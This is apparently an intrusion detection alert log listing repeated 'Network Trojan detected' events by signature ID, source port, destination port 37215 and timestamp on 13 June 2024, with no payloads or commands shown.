              SID:2835222
              Source Port:48028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676023
              SID:2829579
              Source Port:41154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943429
              SID:2829579
              Source Port:59370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321593
              SID:2829579
              Source Port:48796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992317
              SID:2835222
              Source Port:41732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633389
              SID:2835222
              Source Port:45244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024208
              SID:2829579
              Source Port:52170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027624
              SID:2829579
              Source Port:56252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631151
              SID:2829579
              Source Port:38554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486183
              SID:2829579
              Source Port:50030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785545
              SID:2829579
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055796
              SID:2829579
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376865
              SID:2829579
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194871
              SID:2835222
              Source Port:49040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.303881
              SID:2835222
              Source Port:45520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353261
              SID:2835222
              Source Port:39746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271380
              SID:2829579
              Source Port:42534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154148
              SID:2835222
              Source Port:36894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790638
              SID:2835222
              Source Port:56946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246855
              SID:2829579
              Source Port:38766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376723
              SID:2829579
              Source Port:57248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176756
              SID:2835222
              Source Port:36974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097149
              SID:2829579
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091518
              SID:2835222
              Source Port:49210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889368
              SID:2835222
              Source Port:36598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127144
              SID:2835222
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476715
              SID:2829579
              Source Port:41990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309676
              SID:2835222
              Source Port:40756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484975
              SID:2835222
              Source Port:37708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417683
              SID:2829579
              Source Port:57282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475411
              SID:2829579
              Source Port:43114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251770
              SID:2829579
              Source Port:54644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487918
              SID:2835222
              Source Port:33208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942228
              SID:2829579
              Source Port:39664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677524
              SID:2835222
              Source Port:44522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308787
              SID:2829579
              Source Port:59838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153133
              SID:2829579
              Source Port:53878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805919
              SID:2829579
              Source Port:36432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301606
              SID:2829579
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660758
              SID:2835222
              Source Port:43900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487271
              SID:2835222
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263033
              SID:2835222
              Source Port:44476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266901
              SID:2829579
              Source Port:43562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212098
              SID:2829579
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264433
              SID:2835222
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503724
              SID:2835222
              Source Port:46422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566102
              SID:2829579
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210230
              SID:2829579
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929054
              SID:2829579
              Source Port:37758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608826
              SID:2829579
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175929
              SID:2835222
              Source Port:59254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833263
              SID:2829579
              Source Port:50812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612271
              SID:2835222
              Source Port:54352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566141
              SID:2835222
              Source Port:44138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833937
              SID:2829579
              Source Port:42876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227384
              SID:2829579
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253219
              SID:2835222
              Source Port:59550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487351
              SID:2835222
              Source Port:53824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632899
              SID:2829579
              Source Port:60854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402899
              SID:2829579
              Source Port:52200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833124
              SID:2829579
              Source Port:35846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129916
              SID:2829579
              Source Port:54338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301312
              SID:2835222
              Source Port:32860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707929
              SID:2829579
              Source Port:34656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157495
              SID:2829579
              Source Port:34890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132426
              SID:2829579
              Source Port:58486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276375
              SID:2835222
              Source Port:33804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501959
              SID:2835222
              Source Port:50600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420033
              SID:2829579
              Source Port:53856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439026
              SID:2829579
              Source Port:34738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247097
              SID:2829579
              Source Port:56792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154290
              SID:2829579
              Source Port:33662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977275
              SID:2835222
              Source Port:37998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124994
              SID:2829579
              Source Port:56388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.002193
              SID:2840516
              Source Port:4554
              Destination Port:48720
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214634
              SID:2835222
              Source Port:46898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128404
              SID:2835222
              Source Port:58004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835030
              SID:2835222
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789232
              SID:2829579
              Source Port:37050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525587
              SID:2835222
              Source Port:45650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941669
              SID:2835222
              Source Port:51144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458156
              SID:2829579
              Source Port:59224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191811
              SID:2835222
              Source Port:48202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424446
              SID:2835222
              Source Port:50948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942126
              SID:2835222
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132655
              SID:2829579
              Source Port:47702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553929
              SID:2835222
              Source Port:41918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707218
              SID:2835222
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655744
              SID:2829579
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193960
              SID:2829579
              Source Port:40982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014438
              SID:2835222
              Source Port:52804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676570
              SID:2835222
              Source Port:54648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296874
              SID:2835222
              Source Port:41970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614131
              SID:2835222
              Source Port:36296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091083
              SID:2835222
              Source Port:58292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569681
              SID:2835222
              Source Port:59158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785716
              SID:2835222
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079675
              SID:2835222
              Source Port:42652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310328
              SID:2829579
              Source Port:43626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037641
              SID:2835222
              Source Port:40072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841120
              SID:2829579
              Source Port:45208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159334
              SID:2835222
              Source Port:38612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524040
              SID:2829579
              Source Port:54842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872125
              SID:2835222
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969836
              SID:2829579
              Source Port:50530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554804
              SID:2835222
              Source Port:48134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870148
              SID:2835222
              Source Port:58740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571576
              SID:2835222
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219029
              SID:2829579
              Source Port:54058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785984
              SID:2835222
              Source Port:37286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057520
              SID:2835222
              Source Port:50336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660707
              SID:2829579
              Source Port:36804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194129
              SID:2835222
              Source Port:36298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408318
              SID:2835222
              Source Port:47326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180680
              SID:2835222
              Source Port:46608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757740
              SID:2835222
              Source Port:40852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401627
              SID:2829579
              Source Port:51842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606821
              SID:2835222
              Source Port:54690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256388
              SID:2835222
              Source Port:45052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044860
              SID:2829579
              Source Port:44360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094178
              SID:2829579
              Source Port:35484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238345
              SID:2829579
              Source Port:33894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253040
              SID:2829579
              Source Port:48766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091344
              SID:2829579
              Source Port:34128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550707
              SID:2835222
              Source Port:50892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.152739
              SID:2829579
              Source Port:56852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403266
              SID:2829579
              Source Port:41482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932129
              SID:2829579
              Source Port:38466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045280
              SID:2829579
              Source Port:55738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040034
              SID:2829579
              Source Port:53826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455958
              SID:2829579
              Source Port:43684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804495
              SID:2829579
              Source Port:34254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219148
              SID:2835222
              Source Port:60404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781365
              SID:2835222
              Source Port:39118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098343
              SID:2835222
              Source Port:50620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553772
              SID:2835222
              Source Port:48260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658859
              SID:2829579
              Source Port:53264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730306
              SID:2835222
              Source Port:53802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820260
              SID:2829579
              Source Port:58404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302501
              SID:2829579
              Source Port:47930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636249
              SID:2835222
              Source Port:47986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711565
              SID:2829579
              Source Port:36806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303747
              SID:2835222
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129556
              SID:2835222
              Source Port:48554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974717
              SID:2829579
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243913
              SID:2835222
              Source Port:43298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091995
              SID:2835222
              Source Port:56994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452357
              SID:2835222
              Source Port:41016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346648
              SID:2835222
              Source Port:33974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660167
              SID:2835222
              Source Port:56748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094218
              SID:2829579
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242294
              SID:2835222
              Source Port:42290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867082
              SID:2829579
              Source Port:60792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838316
              SID:2835222
              Source Port:48106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707144
              SID:2835222
              Source Port:48694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026517
              SID:2835222
              Source Port:33588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611033
              SID:2835222
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725695
              SID:2829579
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611690
              SID:2829579
              Source Port:58970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406216
              SID:2835222
              Source Port:58698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551260
              SID:2829579
              Source Port:50546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752103
              SID:2829579
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836633
              SID:2835222
              Source Port:57612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308343
              SID:2835222
              Source Port:59006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990302
              SID:2835222
              Source Port:43212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940981
              SID:2835222
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569364
              SID:2835222
              Source Port:54408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308837
              SID:2835222
              Source Port:36896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547138
              SID:2835222
              Source Port:41662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372766
              SID:2829579
              Source Port:50224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173189
              SID:2829579
              Source Port:44060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630770
              SID:2835222
              Source Port:57900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079250
              SID:2829579
              Source Port:38012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502509
              SID:2829579
              Source Port:58828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610905
              SID:2829579
              Source Port:49910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439850
              SID:2829579
              Source Port:44932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975936
              SID:2829579
              Source Port:33896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168092
              SID:2835222
              Source Port:35192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613937
              SID:2829579
              Source Port:47914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079428
              SID:2829579
              Source Port:35648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631701
              SID:2835222
              Source Port:45738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805485
              SID:2829579
              Source Port:35038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099077
              SID:2829579
              Source Port:58114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056786
              SID:2835222
              Source Port:55938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415678
              SID:2835222
              Source Port:44112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048725
              SID:2829579
              Source Port:34114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886976
              SID:2829579
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422150
              SID:2829579
              Source Port:41508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437363
              SID:2835222
              Source Port:44400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756777
              SID:2835222
              Source Port:43658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231781
              SID:2829579
              Source Port:45892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194736
              SID:2829579
              Source Port:52912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752902
              SID:2835222
              Source Port:50444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085249
              SID:2835222
              Source Port:56296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130933
              SID:2835222
              Source Port:55648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551288
              SID:2829579
              Source Port:32824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711660
              SID:2829579
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310241
              SID:2829579
              Source Port:51260
              Destination Port:37215
